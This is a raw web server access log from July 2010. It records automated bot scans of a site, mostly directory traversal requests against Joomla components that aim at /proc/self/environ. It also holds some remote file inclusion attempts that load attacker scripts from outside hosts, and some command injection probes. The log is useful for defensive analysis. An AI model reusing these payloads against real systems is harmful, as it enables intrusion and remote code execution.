110.45.144.106 - - [26/Jul/2010:11:49:36 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
110.45.144.106 - - [26/Jul/2010:11:49:41 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
110.45.144.106 - - [26/Jul/2010:11:50:14 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
110.45.144.106 - - [26/Jul/2010:11:50:14 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
110.45.144.106 - - [26/Jul/2010:11:50:19 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
222.124.193.12 - - [26/Jul/2010:11:51:37 +0200] "GET /logs/access_log//index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
222.124.193.12 - - [26/Jul/2010:11:51:39 +0200] "GET //index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
222.124.193.12 - - [26/Jul/2010:11:51:40 +0200] "GET /logs//index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
110.45.144.106 - - [26/Jul/2010:11:51:57 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
76.242.100.234 - - [26/Jul/2010:11:56:17 +0200] "GET //?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 666 "-" "libwww-perl/5.831"
76.242.100.234 - - [26/Jul/2010:11:56:17 +0200] "GET //?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 666 "-" "libwww-perl/5.831"
110.45.144.106 - - [26/Jul/2010:11:57:11 +0200] "GET /logs/access_log//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.79"
110.45.144.106 - - [26/Jul/2010:11:57:11 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
74.55.73.74 - - [26/Jul/2010:11:57:12 +0200] "GET ///index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.810"
110.45.144.106 - - [26/Jul/2010:11:57:12 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.79"
81.21.78.22 - - [26/Jul/2010:11:57:15 +0200] "GET ///index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.803"
81.21.78.22 - - [26/Jul/2010:11:57:16 +0200] "GET ///index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.803"
92.241.190.214 - - [26/Jul/2010:11:57:45 +0200] "GET ///index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.805"
110.45.144.106 - - [26/Jul/2010:11:58:42 +0200] "GET //index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.79"
110.45.144.106 - - [26/Jul/2010:11:58:54 +0200] "GET //index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.79"
110.45.144.106 - - [26/Jul/2010:11:59:11 +0200] "GET //index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.79"
110.45.144.106 - - [26/Jul/2010:11:59:43 +0200] "GET //index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.79"
110.45.144.106 - - [26/Jul/2010:11:59:53 +0200] "GET /logs/access_log//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.79"
110.45.144.106 - - [26/Jul/2010:11:59:54 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
110.45.144.106 - - [26/Jul/2010:11:59:54 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.79"
110.45.144.106 - - [26/Jul/2010:12:00:06 +0200] "GET /logs/access_log//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.79"
110.45.144.106 - - [26/Jul/2010:12:00:06 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
110.45.144.106 - - [26/Jul/2010:12:00:07 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.79"
211.189.18.186 - - [26/Jul/2010:12:00:38 +0200] "GET ///index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.805"
211.189.18.186 - - [26/Jul/2010:12:00:39 +0200] "GET ///index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.805"
110.45.144.106 - - [26/Jul/2010:12:01:44 +0200] "GET //index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.79"
110.45.144.106 - - [26/Jul/2010:12:03:05 +0200] "GET /logs/access_log//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.79"
110.45.144.106 - - [26/Jul/2010:12:03:06 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
110.45.144.106 - - [26/Jul/2010:12:03:06 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.79"
110.45.144.106 - - [26/Jul/2010:12:05:51 +0200] "GET /logs/access_log//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.79"
110.45.144.106 - - [26/Jul/2010:12:05:52 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
110.45.144.106 - - [26/Jul/2010:12:05:52 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.79"
66.7.221.56 - - [26/Jul/2010:12:06:54 +0200] "GET ////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-" "libwww-perl/5.834"
66.7.221.56 - - [26/Jul/2010:12:06:55 +0200] "GET ////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-" "libwww-perl/5.834"
110.45.144.106 - - [26/Jul/2010:12:07:01 +0200] "GET /logs/access_log//index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 314 "-" "libwww-perl/5.79"
110.45.144.106 - - [26/Jul/2010:12:07:02 +0200] "GET //index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.79"
110.45.144.106 - - [26/Jul/2010:12:07:02 +0200] "GET /logs//index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-" "libwww-perl/5.79"
174.121.240.147 - - [26/Jul/2010:12:10:22 +0200] "GET ///index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.810"
81.21.78.22 - - [26/Jul/2010:12:11:14 +0200] "GET /logs/access_log///index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 314 "-" "libwww-perl/5.803"
81.21.78.22 - - [26/Jul/2010:12:11:14 +0200] "GET ///index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.803"
81.21.78.22 - - [26/Jul/2010:12:11:14 +0200] "GET /logs///index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-" "libwww-perl/5.803"
81.21.78.22 - - [26/Jul/2010:12:11:31 +0200] "GET /logs/access_log///index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 314 "-" "libwww-perl/5.803"
81.21.78.22 - - [26/Jul/2010:12:11:32 +0200] "GET ///index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.803"
81.21.78.22 - - [26/Jul/2010:12:11:32 +0200] "GET /logs///index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-" "libwww-perl/5.803"
67.218.116.163 - - [26/Jul/2010:12:11:35 +0200] "GET /robots.txt HTTP/1.1" 404 297 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
66.187.106.151 - - [26/Jul/2010:12:12:22 +0200] "GET ////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-" "libwww-perl/5.831"
174.121.240.147 - - [26/Jul/2010:12:13:04 +0200] "GET ////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-" "libwww-perl/5.810"
110.45.144.106 - - [26/Jul/2010:12:14:17 +0200] "GET /logs/access_log//index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 314 "-" "libwww-perl/5.79"
110.45.144.106 - - [26/Jul/2010:12:14:18 +0200] "GET //index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.79"
110.45.144.106 - - [26/Jul/2010:12:14:18 +0200] "GET /logs//index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-" "libwww-perl/5.79"
174.121.240.147 - - [26/Jul/2010:12:16:05 +0200] "GET ////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-" "libwww-perl/5.810"
66.7.221.56 - - [26/Jul/2010:12:16:38 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.834"
66.7.221.56 - - [26/Jul/2010:12:16:38 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.834"
66.7.221.56 - - [26/Jul/2010:12:18:30 +0200] "GET /logs/access_log////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 315 "-" "libwww-perl/5.834"
66.7.221.56 - - [26/Jul/2010:12:18:31 +0200] "GET /logs/access_log////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 315 "-" "libwww-perl/5.834"
66.7.221.56 - - [26/Jul/2010:12:18:31 +0200] "GET ////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-" "libwww-perl/5.834"
66.7.221.56 - - [26/Jul/2010:12:18:31 +0200] "GET ////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-" "libwww-perl/5.834"
66.7.221.56 - - [26/Jul/2010:12:18:31 +0200] "GET /logs////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-" "libwww-perl/5.834"
66.7.221.56 - - [26/Jul/2010:12:18:31 +0200] "GET /logs////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-" "libwww-perl/5.834"
92.241.190.214 - - [26/Jul/2010:12:22:41 +0200] "GET /logs/access_log///index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 314 "-" "libwww-perl/5.805"
92.241.190.214 - - [26/Jul/2010:12:22:42 +0200] "GET ///index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.805"
92.241.190.214 - - [26/Jul/2010:12:22:43 +0200] "GET /logs///index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-" "libwww-perl/5.805"
110.45.144.106 - - [26/Jul/2010:12:22:53 +0200] "GET /logs/access_log//index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 314 "-" "libwww-perl/5.79"
110.45.144.106 - - [26/Jul/2010:12:22:54 +0200] "GET //index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.79"
110.45.144.106 - - [26/Jul/2010:12:22:54 +0200] "GET /logs//index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-" "libwww-perl/5.79"
67.195.112.43 - - [26/Jul/2010:12:24:04 +0200] "GET /robots.txt HTTP/1.0" 404 297 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.43 - - [26/Jul/2010:12:24:04 +0200] "GET /logs/ HTTP/1.0" 200 797 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
174.121.240.147 - - [26/Jul/2010:12:26:38 +0200] "GET /logs/access_log////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 315 "-" "libwww-perl/5.810"
174.121.240.147 - - [26/Jul/2010:12:26:38 +0200] "GET ////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-" "libwww-perl/5.810"
174.121.240.147 - - [26/Jul/2010:12:26:38 +0200] "GET /logs////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-" "libwww-perl/5.810"
211.202.2.34 - - [26/Jul/2010:12:32:01 +0200] "GET /index.php?option=com_rokdownloads&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 296 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:12:32:01 +0200] "GET /logs/access_log%20%20/index.php?option=com_rokdownloads&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 314 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:12:32:01 +0200] "GET /logs/index.php?option=com_rokdownloads&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 301 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:12:32:02 +0200] "GET /index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 296 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:12:32:02 +0200] "GET /logs/access_log%20%20/index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 314 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:12:32:02 +0200] "GET /logs/index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 301 "-" "MaMa CaSpEr"
110.45.144.106 - - [26/Jul/2010:12:32:29 +0200] "GET /logs/access_log//index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 314 "-" "libwww-perl/5.79"
110.45.144.106 - - [26/Jul/2010:12:32:29 +0200] "GET //index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.79"
110.45.144.106 - - [26/Jul/2010:12:32:30 +0200] "GET /logs//index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-" "libwww-perl/5.79"
174.121.240.147 - - [26/Jul/2010:12:39:29 +0200] "GET /logs/access_log///index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 314 "-" "libwww-perl/5.810"
174.121.240.147 - - [26/Jul/2010:12:39:29 +0200] "GET ///index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.810"
174.121.240.147 - - [26/Jul/2010:12:39:30 +0200] "GET /logs///index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-" "libwww-perl/5.810"
211.189.18.186 - - [26/Jul/2010:12:40:38 +0200] "GET /logs/access_log///index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 314 "-" "libwww-perl/5.805"
211.189.18.186 - - [26/Jul/2010:12:40:39 +0200] "GET ///index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.805"
211.189.18.186 - - [26/Jul/2010:12:40:39 +0200] "GET /logs///index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-" "libwww-perl/5.805"
211.189.18.186 - - [26/Jul/2010:12:41:26 +0200] "GET /logs/access_log///index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 314 "-" "libwww-perl/5.805"
211.189.18.186 - - [26/Jul/2010:12:41:27 +0200] "GET ///index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.805"
211.189.18.186 - - [26/Jul/2010:12:41:27 +0200] "GET /logs///index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-" "libwww-perl/5.805"
66.7.221.56 - - [26/Jul/2010:12:43:19 +0200] "GET ////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-" "libwww-perl/5.834"
66.7.221.56 - - [26/Jul/2010:12:43:20 +0200] "GET ////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-" "libwww-perl/5.834"
193.43.92.192 - - [26/Jul/2010:12:43:41 +0200] "GET ////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-" "libwww-perl/5.836"
193.43.92.192 - - [26/Jul/2010:12:43:45 +0200] "GET ////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-" "libwww-perl/5.836"
66.7.221.56 - - [26/Jul/2010:12:46:08 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.834"
66.7.221.56 - - [26/Jul/2010:12:46:08 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.834"
193.43.92.192 - - [26/Jul/2010:12:46:41 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.836"
91.121.7.123 - - [26/Jul/2010:12:47:01 +0200] "GET /logs/access_log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.810"
91.121.7.123 - - [26/Jul/2010:12:47:01 +0200] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
91.121.7.123 - - [26/Jul/2010:12:47:01 +0200] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.810"
66.187.106.151 - - [26/Jul/2010:12:47:46 +0200] "GET /logs/access_log////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 315 "-" "libwww-perl/5.831"
66.187.106.151 - - [26/Jul/2010:12:47:46 +0200] "GET ////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-" "libwww-perl/5.831"
66.187.106.151 - - [26/Jul/2010:12:47:46 +0200] "GET /logs////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-" "libwww-perl/5.831"
195.186.81.78 - - [26/Jul/2010:12:49:12 +0200] "GET //?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 666 "-" "libwww-perl/5.808"
195.186.81.78 - - [26/Jul/2010:12:49:12 +0200] "GET //?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 666 "-" "libwww-perl/5.808"
89.200.169.163 - - [26/Jul/2010:12:49:50 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.813"
89.200.169.163 - - [26/Jul/2010:12:49:50 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.813"
91.121.7.123 - - [26/Jul/2010:12:50:22 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.810"
188.127.248.175 - - [26/Jul/2010:12:50:22 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.808"
91.121.7.123 - - [26/Jul/2010:12:50:23 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.810"
188.127.248.175 - - [26/Jul/2010:12:50:23 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.808"
216.65.69.25 - - [26/Jul/2010:12:50:24 +0200] "GET //download.php?board_skin_path=http://spinparty.pl/tmp/id1.txt?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
216.65.69.25 - - [26/Jul/2010:12:50:24 +0200] "GET /logs//download.php?board_skin_path=http://spinparty.pl/tmp/id1.txt?? HTTP/1.1" 404 305 "-" "Mozilla/5.0"
216.65.69.25 - - [26/Jul/2010:12:50:24 +0200] "GET /logs/access_log//download.php?board_skin_path=http://spinparty.pl/tmp/id1.txt?? HTTP/1.1" 404 316 "-" "Mozilla/5.0"
216.65.69.25 - - [26/Jul/2010:12:50:42 +0200] "GET //download.php?board_skin_path=http://spinparty.pl/tmp/id1.txt?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
216.65.69.25 - - [26/Jul/2010:12:50:42 +0200] "GET /logs/access_log//download.php?board_skin_path=http://spinparty.pl/tmp/id1.txt?? HTTP/1.1" 404 316 "-" "Mozilla/5.0"
216.65.69.25 - - [26/Jul/2010:12:50:42 +0200] "GET /logs//download.php?board_skin_path=http://spinparty.pl/tmp/id1.txt?? HTTP/1.1" 404 305 "-" "Mozilla/5.0"
64.34.172.171 - - [26/Jul/2010:12:51:00 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.834"
64.34.172.171 - - [26/Jul/2010:12:51:00 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.834"
66.7.221.56 - - [26/Jul/2010:12:55:58 +0200] "GET /logs/access_log////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 315 "-" "libwww-perl/5.834"
66.7.221.56 - - [26/Jul/2010:12:55:58 +0200] "GET ////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-" "libwww-perl/5.834"
66.7.221.56 - - [26/Jul/2010:12:55:58 +0200] "GET /logs////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-" "libwww-perl/5.834"
66.7.221.56 - - [26/Jul/2010:12:56:10 +0200] "GET /logs/access_log////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 315 "-" "libwww-perl/5.834"
66.7.221.56 - - [26/Jul/2010:12:56:10 +0200] "GET ////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-" "libwww-perl/5.834"
66.7.221.56 - - [26/Jul/2010:12:56:10 +0200] "GET /logs////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-" "libwww-perl/5.834"
193.43.92.192 - - [26/Jul/2010:13:05:32 +0200] "GET /logs/access_log////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 315 "-" "libwww-perl/5.836"
193.43.92.192 - - [26/Jul/2010:13:05:32 +0200] "GET ////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-" "libwww-perl/5.836"
193.43.92.192 - - [26/Jul/2010:13:05:32 +0200] "GET /logs////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-" "libwww-perl/5.836"
193.43.92.192 - - [26/Jul/2010:13:05:56 +0200] "GET /logs/access_log////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 315 "-" "libwww-perl/5.836"
193.43.92.192 - - [26/Jul/2010:13:05:56 +0200] "GET ////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-" "libwww-perl/5.836"
193.43.92.192 - - [26/Jul/2010:13:05:56 +0200] "GET /logs////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-" "libwww-perl/5.836"
174.121.240.147 - - [26/Jul/2010:13:08:26 +0200] "GET /logs/access_log////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 315 "-" "libwww-perl/5.810"
174.121.240.147 - - [26/Jul/2010:13:08:26 +0200] "GET ////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-" "libwww-perl/5.810"
174.121.240.147 - - [26/Jul/2010:13:08:27 +0200] "GET /logs////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-" "libwww-perl/5.810"
87.233.155.149 - - [26/Jul/2010:13:10:11 +0200] "GET /logs//?option=com_dioneformwizard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 802 "-" "libwww-perl/5.79"
